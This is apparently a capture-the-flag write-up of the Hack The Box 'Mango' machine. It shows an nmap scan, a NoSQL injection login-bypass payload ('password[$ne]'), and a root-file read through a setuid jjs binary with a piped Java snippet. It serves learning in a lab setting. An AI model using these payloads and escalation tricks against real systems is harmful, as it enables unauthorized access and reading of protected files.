This is a writeup for the Mango Machine from hackthebox.

Hack The Box is an online platform to improve your penetration skills and exchange ideas and methodologies with thousands of people in the security field.

Overview:

No SQL Injection, JJS privilege escalation.

Part1: Getting User

Recon:

Whenever I get an IP, I start with the nmap scan and save it in my nmap directory so here it is:

nmap -sC -sV -oA nmap/mango 10.10.10.162

The output is:

nmap result for mango

Port 443: common name in the certificate got my attention so I quickly added it in my /etc/hosts file then I opened it in the browser and got login page.

No SQL Injection:

What is the first thing people do when they get a login page?

Try common usernames and passwords but they don’t seem to work here, then I tried SQL Injection but no luck 😞

Wait ! I forgot to check the type of database. I searched about the mango inference engine and got this article. Ummm! MongoDB(NoSQL Database), Let’s try NoSQL injection. I intercepted the request using burp and tried this:

username=admin&password[%24ne]=&login=login

Trying NoSQL injection

302 in response, let’s follow the redirect :

No SQL Injection

So yes it is NoSQL injection, without wasting my time I quickly wrote a script for NoSQL Injection, you can find it here. I tried for two users admin and mango. (admin as in admin@mango.htb and mango as the name of the machine)

got a password for mango.

I got the password for mango, similarly got it for admin.

user.txt:

I logged in as mango using ssh and found that I cannot read user.txt as mango. It did not have permission to read the user.txt file. I switched the user to admin and got user.txt.

user.txt

Part2: Getting root.txt

Recon:

Whenever I try for root I perform a few things first like finding kernel exploit, pspy, LinEnum, Linux Smart Enumeration (lse.sh). I tried all of these where the output of lse.sh caught my attention.

./lse.sh -l 1

Whenever I get any uncommon setuid binaries I refer to GTFOBins. I searched for JJS and got a wonderful way to exploit it.

root.txt:

After tweaking a bit around, finally, I was able to figure out the correct command.

In Java to read a file, we need to create a buffer. So the first line is creating an object to access that buffer. The second line is creating an object of file reader. I am reading the file line-by-line using the file reader object and putting it in the buffer. Finally, the buffer is piped into jjs.

echo ‘var BufferedReader = Java.type(“java.io.BufferedReader”);

var FileReader = Java.type(“java.io.FileReader”);

var br = new BufferedReader(new FileReader(“/root/root.txt”));

while ((line = br.readLine()) != null) { print(line); }’ | jjs

lo and behold! the content of root.txt popped out 😃

root.txt

This was the first time I was exploiting NoSQL Injection. I hope you learned from this article.